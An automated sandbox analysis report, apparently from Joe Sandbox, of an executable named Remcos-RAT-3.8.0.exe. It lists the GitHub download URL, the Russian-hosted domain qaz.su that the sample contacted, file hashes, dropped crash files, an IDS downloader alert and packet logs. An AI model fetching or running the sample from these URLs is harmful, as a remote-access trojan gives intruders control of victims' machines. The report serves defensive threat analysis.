https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exex | wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://qaz.su/index.php?a=admin | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/ | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/privacy | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/favicon.ico | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/js/jquery-1.12.4.min.js | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/contact | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/index.php?a=user | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/js/jquery.tipsy.js | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su/tos | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://qaz.su | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://qaz.is | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeRxz | wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://qaz.su/css/font-awesome.css | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
140.82.114.4 | github.com | United States | 36459 | GITHUBUS | false
80.87.203.251 | qaz.su | Russian Federation | 29182 | THEFIRST-ASRU | false
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1644538
                            Start date and time:2025-03-20 17:01:28 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 7s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:urldownload.jbs
                            Sample URL:https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal72.evad.win@6/7@3/3
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 0
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.71.93.126, 184.31.69.3, 40.126.24.84, 20.12.23.50, 23.96.180.189, 150.171.27.10, 23.44.201.36
                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobvmssprdeus02.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, g.bing.com, umwatson.events.data.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target Remcos-RAT-3.8.0.exe, PID 8472 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
Time | Type | Description
12:02:25 | API Interceptor | 10x Sleep call for process: Remcos-RAT-3.8.0.exe modified
12:02:29 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                            No context
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.166358160959894
                            Encrypted:false
                            SSDEEP:192:e3g73Xf0BU/KaGc+LyIZzuiFWZ24IO8U:t738BU/KaPcDZzuiFWY4IO8U
                            MD5:AA4085EDAD3376FBD07FD37693179D06
                            SHA1:12F85DDA1C118303DE355C8315E0179437C267B5
                            SHA-256:5B0AFF85F85097BEC523F990F152A8CC87921BDD7EACE958417303336BA439AF
                            SHA-512:8551C679644461CC626436036E6F09FFB23F57F79F0A6252D696104633CDEAB8945B8F7B565D07E242FD711DDD8FFEF77D3B15F5B377E72F52C46E4CF360A6F9
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.9.6.0.1.4.7.4.9.0.3.5.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.9.6.0.1.4.8.1.6.2.2.1.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.0.9.a.2.b.c.-.e.5.9.9.-.4.9.0.d.-.a.8.a.3.-.a.4.b.2.7.d.6.2.9.b.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.5.5.9.3.2.0.-.2.8.3.9.-.4.4.2.3.-.8.c.d.d.-.0.c.5.d.7.1.f.3.d.1.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.m.c.o.s.-.R.A.T.-.3...8...0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.y.s.t.e.m.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.1.8.-.0.0.0.1.-.0.0.1.8.-.3.5.6.0.-.e.3.7.7.b.1.9.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.2.9.a.c.f.7.d.2.5.1.c.8.5.7.6.1.5.c.8.a.d.2.8.9.9.e.1.3.f.a.a.0.0.0.0.0.0.0.0.!.0.0.0.0.d.1.8.a.8.9.6.1.0.c.4.a.b.5.f.f.7.3.5.3.2.a.6.0.8.e.3.b.a.0.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Mar 20 16:02:27 2025, 0x1205a4 type
                            Category:dropped
                            Size (bytes):298658
                            Entropy (8bit):3.558159919841817
                            Encrypted:false
                            SSDEEP:3072:id6uX7LTgJjnyesRZzHtC5Pym2p4uEqSB:iguX/TgdnyesTNC5kp4b
                            MD5:A554BBD33E151D20B0D07F2C7E20BC83
                            SHA1:700D51F3D34844683E0366D0E497E3E72D07177E
                            SHA-256:F523A12F071B21A007B250592873361EFA3DA30AE0F758A24434548DD5F5A04A
                            SHA-512:B04A9A4717FD334799E28F971D395960A80662DE41CBF956D23958BFEA280EB3ED34F093EFB9AB2F522B88C3EDEC075D065869E8B4F86E79CD39A0B4D07D0EDA
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... ........<.g....................................<....(......4$..Hc..........`.......8...........T............U...9..........L(..........8*..............................................................................eJ.......*......GenuineIntel............T........!...<.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8430
                            Entropy (8bit):3.695416714182132
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJh8686YV4ySU9p350WjgmfZnJprV89bm2dZsfrim:R6lXJ6686YqySU9pWWjgmfJWm2dyfP
                            MD5:7CDC999EA885600E2D21A2B4D4D0AB04
                            SHA1:07644A9E82A461D2C2FD924075688C464A7B3886
                            SHA-256:95C047FEFD0305B8683D939BB77D1C929FEDCF58F34B88A6D45C2006E350B008
                            SHA-512:4B5C428751F47037A0697405B3D5DB354754CDEDF9131EFB0EACF7128E29D9E1D66735AD7B234B2A9F6C7F70FF09A6EDCFB338C456606221904EEC575C84BFAA
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.4.7.2.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.4848571345548205
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zs0Jg77aI916WOa8tLYm8M4JkW3FOj+q8v1WLQBCBYd:uIjfyI7H7Ol0JyjKmgCBYd
                            MD5:974F2DABBAFE42D974AB4BB5F0EEF3ED
                            SHA1:A0419E1E8BE9213250978B427EE68E778FBFABE7
                            SHA-256:0A42166BC162BB2DE7FC527A204C964E799957B316B04628B8BA7E042ABAC1FD
                            SHA-512:E7EC9F8846FE8D2B29A6DE70AC4576276FCDFFE9F2DBB817557CB39BD0B2BBE3C7F1DF96E3382C8EEE42792956D15B455EF8455520D6ADC283660318BA622D57
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="769385" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):1113
                            Entropy (8bit):5.215768150205967
                            Encrypted:false
                            SSDEEP:24:bu+no51DxePnSMGs+2U9ovzEMGs+2tMGjMGYvMGjMGG6xePg+I3Pb9SMvQPb9SpP:bTnobDiO2vXO2ux6x565b9SYyb9S/Z
                            MD5:1A39C2FC4E006B0C9A98E781D497BAE6
                            SHA1:0ACFD42206EE553D01C490AD9FABDBDB03066BCA
                            SHA-256:7EB876DBB755A0E534B803DBD0CE19B4B675D172D033006304AFDFFDA89B5AE9
                            SHA-512:D439DA555A5320E2F0124A8A92DCB5C66B9E805B77696BE95B3946DBACE23F05CADEE2991E048191431E960D7D7394345188B7805D31F936DD3D031C1A4B4141
                            Malicious:false
                            Reputation:low
                            Preview:--2025-03-20 12:02:20-- https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe..Resolving github.com (github.com)... 140.82.114.4..Connecting to github.com (github.com)|140.82.114.4|:443... connected...HTTP request sent, awaiting response... 302 Found..Location: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe [following]..--2025-03-20 12:02:21-- https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe..Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, .....Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected...HTTP request sent, awaiting response... 200 OK..Length: 7168 (7.0K) [application/octet-stream]..Saving to: 'C:/Users/user/Desktop/download/Remcos-RAT-3.8.0.exe'.... 0K ....... 100% 240K=0.03s.
                            Process:C:\Windows\SysWOW64\wget.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):4.6253897524833
                            Encrypted:false
                            SSDEEP:96:oz4/c4Kr6GgZ2+dzcMsio1ZafV/WyDhh1e35YZNW+hC/zNt:64KuG+2I5xfVWyDhh1eG10p
                            MD5:6166F997B4BB3428AE0D9D4B4E1F0DB2
                            SHA1:D18A89610C4AB5FF73532A608E3BA0038D6146E0
                            SHA-256:3E3EF95E4D20E1CF759021D91F834B6F2C82A1A9DBAB3CAB1605A55BC85D5BE5
                            SHA-512:087BE6857F602A648C612C9C849560C8C803182BF08BBDBC41F58EB17E28A1822DED1B1FB45C9A007722B6C6A19754671159A0A3510CC80188D3C145AB5A297C
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 79%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............0... ...@....@.. ....................................`..................................0..O....@.......................`......./..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........"..............4/...............................................0...........r...p(............9o....r...p..(......r5..p(........9..........(.....rc..p.......(.....r...pr|..p...(......s..........r...p.(....o.........,...o...........(.....r...p.(....(....&.....(.....~....r...p.o.........(....o......8.....rc..p.......(.....r5..p....(....&s...........r*..p.(....o..........(.....r*..p.(....(....&.....(.....~....r...p.o.........(....o..........,...o...........(..........(.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.461264989737572
                            Encrypted:false
                            SSDEEP:6144:L52cwMWh0HQdcETgP70KkM8NqaCskjPrWBYCw6o+u8O/zvX9smlYXgTw:d2n8BkRFBYCfkDztFlVw
                            MD5:8B226B9E848ED00CD479374CBB0EAF3B
                            SHA1:7BABDC192C0F62327CD59ECE7B33850878C1A5BF
                            SHA-256:9348D3FFFC195722D68F94191CD82822AE7410D21BA1142752DD64171AF73A6C
                            SHA-512:050BFED7EE0FD7E71EE51E333C8AF8914EBE0E12EAB8AF7C8727E4101EB0539387F45BD349F88E57E5FD8B4E5D5E62CAFDE913C2A5F356B954DD0844C713DAD5
                            Malicious:false
                            Reputation:low
                            Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...z...................................................................................................................................................................................................................................................................................................................................................N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            No static file info


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-20T17:02:28.362047+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49725 | 80.87.203.251 | 443 | TCP
                            • Total Packets: 41
                            • 443 (HTTPS)
                            • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2025 17:02:22.185954094 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:22.185995102 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.186096907 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:22.187686920 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:22.187717915 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.401119947 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.401485920 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:22.403250933 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:22.403259039 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.403748035 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.405354023 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:22.448329926 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.678725004 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:22.733056068 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:23.103673935 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:23.103691101 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:23.103749037 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:23.103773117 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:23.103789091 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:23.103818893 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:23.103858948 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:23.110950947 CET | 49722 | 443 | 192.168.2.5 | 140.82.114.4
Mar 20, 2025 17:02:23.110964060 CET | 443 | 49722 | 140.82.114.4 | 192.168.2.5
Mar 20, 2025 17:02:23.232435942 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.232497931 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.232566118 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.234261990 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.234286070 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.439620972 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.439743042 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.441226959 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.441247940 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.441540956 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.442569017 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.488337994 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.698784113 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.698853016 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.698884964 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.698915958 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.698916912 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.698949099 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.698970079 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.701786995 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.701837063 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.701843977 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.701854944 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:23.701905966 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.731925011 CET | 49723 | 443 | 192.168.2.5 | 185.199.110.133
Mar 20, 2025 17:02:23.731945992 CET | 443 | 49723 | 185.199.110.133 | 192.168.2.5
Mar 20, 2025 17:02:26.103060961 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:26.103105068 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:26.103219986 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:26.114451885 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:26.114468098 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:26.378484011 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:26.378613949 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:26.381849051 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:26.381861925 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:26.382270098 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:26.433661938 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:26.476341009 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:27.205471039 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:27.205554008 CET | 443 | 49724 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:27.205607891 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.213413000 CET | 49724 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.216473103 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.216526031 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:27.216608047 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.216833115 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.216851950 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:27.493330002 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:27.545579910 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.589234114 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:27.589251041 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:28.362086058 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:28.362118959 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:28.362142086 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:28.362227917 CET | 443 | 49725 | 80.87.203.251 | 192.168.2.5
Mar 20, 2025 17:02:28.362238884 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:28.362281084 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
Mar 20, 2025 17:02:28.370863914 CET | 49725 | 443 | 192.168.2.5 | 80.87.203.251
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 20, 2025 17:02:22.013801098 CET | 63842 | 53 | 192.168.2.5 | 1.1.1.1
                            Mar 20, 2025 17:02:22.158931971 CET | 53 | 63842 | 1.1.1.1 | 192.168.2.5
                            Mar 20, 2025 17:02:23.121454000 CET | 52359 | 53 | 192.168.2.5 | 1.1.1.1
                            Mar 20, 2025 17:02:23.228535891 CET | 53 | 52359 | 1.1.1.1 | 192.168.2.5
                            Mar 20, 2025 17:02:25.490021944 CET | 60770 | 53 | 192.168.2.5 | 1.1.1.1
                            Mar 20, 2025 17:02:26.097472906 CET | 53 | 60770 | 1.1.1.1 | 192.168.2.5
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
